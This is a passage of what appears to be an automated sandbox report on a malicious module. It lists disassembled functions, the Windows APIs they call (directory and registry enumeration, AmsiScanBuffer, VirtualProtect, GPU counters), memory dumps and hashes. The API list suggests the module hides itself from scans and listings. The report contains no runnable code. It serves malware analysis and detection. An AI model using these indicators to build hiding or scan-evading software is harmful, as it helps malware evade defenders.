NtQueryDirectoryFileEx, xrefs: 0000022413931EFC
amsi.dll, xrefs: 0000022413932019
pdh.dll, xrefs: 0000022413931FD7, 0000022413931FF8
NtQueryDirectoryFile, xrefs: 0000022413931EDF
PdhGetRawCounterArrayW, xrefs: 0000022413931FD0
NtEnumerateKey, xrefs: 0000022413931F19
advapi32.dll, xrefs: 0000022413931F57, 0000022413931F78
sechost.dll, xrefs: 0000022413931F99
NtDeviceIoControlFile, xrefs: 0000022413931FB6
NtResumeThread, xrefs: 0000022413931EC2
NtEnumerateValueKey, xrefs: 0000022413931F36
ntdll.dll, xrefs: 0000022413931E8D
PdhGetFormattedCounterArrayW, xrefs: 0000022413931FF1

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: be69f8292aea042b5e43eb4ac712a50161521e291cbbba5b84fe03091685efff
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 5E517BA0134A8AB9EF04FBE4EE4A6D43F60A74474DF8049539C4D0A57DDE7882FAC781

Function 00000224139012B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022413901315
GetProcessHeap.KERNEL32 ref: 0000022413901323
HeapAlloc.KERNEL32 ref: 0000022413901334
RegEnumValueW.ADVAPI32 ref: 0000022413901393

Part of subcall function 0000022413901530: StrCmpIW.SHLWAPI ref: 0000022413901561

GetProcessHeap.KERNEL32 ref: 00000224139013DB
HeapAlloc.KERNEL32 ref: 00000224139013E9
GetProcessHeap.KERNEL32 ref: 0000022413901406
HeapFree.KERNEL32 ref: 0000022413901414
lstrlenW.KERNEL32 ref: 000002241390141D
GetProcessHeap.KERNEL32 ref: 000002241390142B
HeapAlloc.KERNEL32 ref: 0000022413901439
StrCpyW.SHLWAPI ref: 000002241390145B
GetProcessHeap.KERNEL32 ref: 0000022413901472
HeapFree.KERNEL32 ref: 0000022413901480

Strings

d, xrefs: 0000022413901356

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: ad13465836221ed923f9e3632f7fd434756f47bfc4f7883396bacacb7218285a
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 37515C72220B84E6EB65DFA2E44835A7BA5F788F98F454124DE4E5B72CDF3CC4A58700

Function 00000224139312B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000022413931315
GetProcessHeap.KERNEL32 ref: 0000022413931323
HeapAlloc.KERNEL32 ref: 0000022413931334
RegEnumValueW.ADVAPI32 ref: 0000022413931393

Part of subcall function 0000022413931530: StrCmpIW.SHLWAPI ref: 0000022413931561

GetProcessHeap.KERNEL32 ref: 00000224139313DB
HeapAlloc.KERNEL32 ref: 00000224139313E9
GetProcessHeap.KERNEL32 ref: 0000022413931406
HeapFree.KERNEL32 ref: 0000022413931414
lstrlenW.KERNEL32 ref: 000002241393141D
GetProcessHeap.KERNEL32 ref: 000002241393142B
HeapAlloc.KERNEL32 ref: 0000022413931439
StrCpyW.SHLWAPI ref: 000002241393145B
GetProcessHeap.KERNEL32 ref: 0000022413931472
HeapFree.KERNEL32 ref: 0000022413931480

Strings

d, xrefs: 0000022413931356

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 9416425dfeb720b221a80741509fc01688272a48952da9b9feb7ab4632517e40
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: F3510E72624B84E6EB54EFA2E55835A7BA1F788F98F444124DE4D4BB68DF38C095C700

Function 000002241390EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000002241390F34A,?,?,00000000,000002241390F2CD), ref: 000002241390EFF5
GetLastError.KERNEL32(?,?,00000000,000002241390F2CD), ref: 000002241390F007
LoadLibraryExW.KERNEL32(?,?,00000000,000002241390F2CD), ref: 000002241390F049
VirtualProtect.KERNEL32 ref: 000002241390F0A5
VirtualProtect.KERNEL32 ref: 000002241390F0D6
FreeLibrary.KERNEL32(?,?,00000000,000002241390F2CD), ref: 000002241390F11A
GetProcAddress.KERNEL32(?,?,00000000,000002241390F2CD), ref: 000002241390F126

Strings

api-ms-, xrefs: 000002241390F01B
AppPolicyGetProcessTerminationMethod, xrefs: 000002241390F157, 000002241390F165
ext-ms-, xrefs: 000002241390F02E

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 6833dc8272e2a0ad8e4b41580b55823730c644dd1f92ed6e1ffa8d5ae0fb52aa
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 5851C92172174461EE55BBD6D8083663B54B748BB8F4807259D3E4F3D8DF38D5E9C640

Function 000002241393EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000002241393F34A,?,?,00000000,000002241393F2CD), ref: 000002241393EFF5
GetLastError.KERNEL32(?,?,00000000,000002241393F2CD), ref: 000002241393F007
LoadLibraryExW.KERNEL32(?,?,00000000,000002241393F2CD), ref: 000002241393F049
VirtualProtect.KERNEL32 ref: 000002241393F0A5
VirtualProtect.KERNEL32 ref: 000002241393F0D6
FreeLibrary.KERNEL32(?,?,00000000,000002241393F2CD), ref: 000002241393F11A
GetProcAddress.KERNEL32(?,?,00000000,000002241393F2CD), ref: 000002241393F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 000002241393F157, 000002241393F165
api-ms-, xrefs: 000002241393F01B
ext-ms-, xrefs: 000002241393F02E

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 41cf1ac18fc09d1f60949655d5ebda905458326e5d67a8f867ad28ba186d02b4
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: AF51CB6272174461EE14BBE6E6083A53B50B748BB8F4807259D7E0B7E8DF38D4A9C740

Function 00000224139033A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000224139033FD
GetProcessHeap.KERNEL32 ref: 0000022413903412
HeapAlloc.KERNEL32 ref: 0000022413903420
PdhGetCounterInfoW.PDH ref: 0000022413903436
StrCmpW.SHLWAPI ref: 000002241390344B

Part of subcall function 0000022413903950: StrCmpNW.SHLWAPI ref: 0000022413903972
Part of subcall function 0000022413903950: StrStrW.SHLWAPI ref: 0000022413903990
Part of subcall function 0000022413903950: StrToIntW.SHLWAPI ref: 00000224139039B7

GetProcessHeap.KERNEL32 ref: 0000022413903488
HeapFree.KERNEL32 ref: 0000022413903496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000022413903444

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: da6139e6fb9f655a8c9e95cbbf9badde996b7a70173956fadf0adfb1eced0cb6
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 7331CA22620A40E6EF21EF92A88C75AB7A4F748BD9F450615DD4D5F62CDF38C8A68740

Function 00000224139333A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 00000224139333FD
GetProcessHeap.KERNEL32 ref: 0000022413933412
HeapAlloc.KERNEL32 ref: 0000022413933420
PdhGetCounterInfoW.PDH ref: 0000022413933436
StrCmpW.SHLWAPI ref: 000002241393344B

Part of subcall function 0000022413933950: StrCmpNW.SHLWAPI ref: 0000022413933972
Part of subcall function 0000022413933950: StrStrW.SHLWAPI ref: 0000022413933990
Part of subcall function 0000022413933950: StrToIntW.SHLWAPI ref: 00000224139339B7

GetProcessHeap.KERNEL32 ref: 0000022413933488
HeapFree.KERNEL32 ref: 0000022413933496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000022413933444

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 91592e1c37c13655c8d3d30bcd9abe2dad49406d5c6fae7fb35999eed484668c
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 6231B862620A40E6EF21EFA2E94C759B7A0F748BD9F444515DD4D4BB3CDF38C4A58740

Function 00000224139034B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000022413903516
GetProcessHeap.KERNEL32 ref: 0000022413903527
HeapAlloc.KERNEL32 ref: 0000022413903535
PdhGetCounterInfoW.PDH ref: 000002241390354B
StrCmpW.SHLWAPI ref: 0000022413903560

Part of subcall function 0000022413903950: StrCmpNW.SHLWAPI ref: 0000022413903972
Part of subcall function 0000022413903950: StrStrW.SHLWAPI ref: 0000022413903990
Part of subcall function 0000022413903950: StrToIntW.SHLWAPI ref: 00000224139039B7

GetProcessHeap.KERNEL32 ref: 000002241390358D
HeapFree.KERNEL32 ref: 000002241390359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000022413903559

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: b521ccbab354a8479b7a3fd15a7b093f633a2fa3eb72d141a86a4a5855f2357f
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 27318421620F41E6EF51EF92A48875A7BA4B784F98F454125DE4E5B768DF38C8A1C700

Function 00000224139334B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000022413933516
GetProcessHeap.KERNEL32 ref: 0000022413933527
HeapAlloc.KERNEL32 ref: 0000022413933535
PdhGetCounterInfoW.PDH ref: 000002241393354B
StrCmpW.SHLWAPI ref: 0000022413933560

Part of subcall function 0000022413933950: StrCmpNW.SHLWAPI ref: 0000022413933972
Part of subcall function 0000022413933950: StrStrW.SHLWAPI ref: 0000022413933990
Part of subcall function 0000022413933950: StrToIntW.SHLWAPI ref: 00000224139339B7

GetProcessHeap.KERNEL32 ref: 000002241393358D
HeapFree.KERNEL32 ref: 000002241393359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000022413933559

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: ecb0381640c0a2a583d32085e1d0002ed1ac5438ea9275369c0eb4d86286f311
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: C3316661620B41E6EF11EFA2E5887597BE0BB84F98F444125DE4E4B738EF38C8A5C700

Function 000002241390A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002241390A289

Part of subcall function 000002241390B144: __GetUnwindTryBlock.LIBCMT ref: 000002241390B187
Part of subcall function 000002241390B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002241390B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002241390A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002241390A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002241390A6BC

Strings

csm, xrefs: 000002241390A384
csm, xrefs: 000002241390A2A3
csm, xrefs: 000002241390A30A

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 24f681061a3e6246a95a636a5f3a31ffd245458c44839c90a10969825098483f
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 91D16E72624780AAFF20EBA5D44839D7BA8F75579CF100215EE8D5BBA9DB38C4E1C740

Function 00000224138D962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00000224138D9689

Part of subcall function 00000224138DA544: __GetUnwindTryBlock.LIBCMT ref: 00000224138DA587
Part of subcall function 00000224138DA544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00000224138DA5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00000224138D9761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00000224138D99AF
std::bad_alloc::bad_alloc.LIBCMT ref: 00000224138D9ABC

Strings

csm, xrefs: 00000224138D9784
csm, xrefs: 00000224138D96A3
csm, xrefs: 00000224138D970A

Memory Dump Source

Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: 3c86197f5f703cdd3fc01469f3f12610a4217abfafb8882004ceccf518629907
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 3ED17B32614780AAEF60AFA5D4883AD7BE1F78579CF100115EE8D5BB9ADB34E4E1C700

Function 000002241393A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000002241393A289

Part of subcall function 000002241393B144: __GetUnwindTryBlock.LIBCMT ref: 000002241393B187
Part of subcall function 000002241393B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000002241393B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000002241393A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000002241393A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000002241393A6BC

Strings

csm, xrefs: 000002241393A30A
csm, xrefs: 000002241393A2A3
csm, xrefs: 000002241393A384

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: 830792ead4b74612dbe2a56751b57a494cc6b5297b80a0d6cd8c59b254b0ce05
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: A7D16EB2A247809AFF20ABB5D64839D7BA4F74579CF100115EE8D5BBA9DB38C4E1C701

Function 000002241390104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000224139010B1
RegEnumValueW.ADVAPI32 ref: 0000022413901117
GetProcessHeap.KERNEL32 ref: 000002241390115A
HeapAlloc.KERNEL32 ref: 0000022413901168
GetProcessHeap.KERNEL32 ref: 0000022413901185
HeapFree.KERNEL32 ref: 0000022413901193

Strings

d, xrefs: 00000224139010D6

Memory Dump Source

Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true

Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 6ed320e0c140f8f6d5934df7a4d03878a02c08582cd3e0acd6714a3e8994480e
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: E0418073224B80DAEBA4DF61E44839A7BA5F388B98F448119DE8D0B75CDF38C495CB40

Function 000002241393104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 00000224139310B1
RegEnumValueW.ADVAPI32 ref: 0000022413931117
GetProcessHeap.KERNEL32 ref: 000002241393115A
HeapAlloc.KERNEL32 ref: 0000022413931168
GetProcessHeap.KERNEL32 ref: 0000022413931185
HeapFree.KERNEL32 ref: 0000022413931193

Strings

d, xrefs: 00000224139310D6

Memory Dump Source

Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true

Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: b746889e9b512cdc627c002f2ce9b9604aae39da49f69c11c56c24190265a741
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: C0415172224B84D6EB60DFA1E54839A7BB1F388B98F448115DE890BB6CDF38C495CB40

Function 0000022413902518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002241390252D
GetCurrentProcessId.KERNEL32 ref: 0000022413902537
CreateFileW.KERNEL32 ref: 0000022413902568
WriteFile.KERNEL32 ref: 0000022413902590
ReadFile.KERNEL32 ref: 00000224139025AF
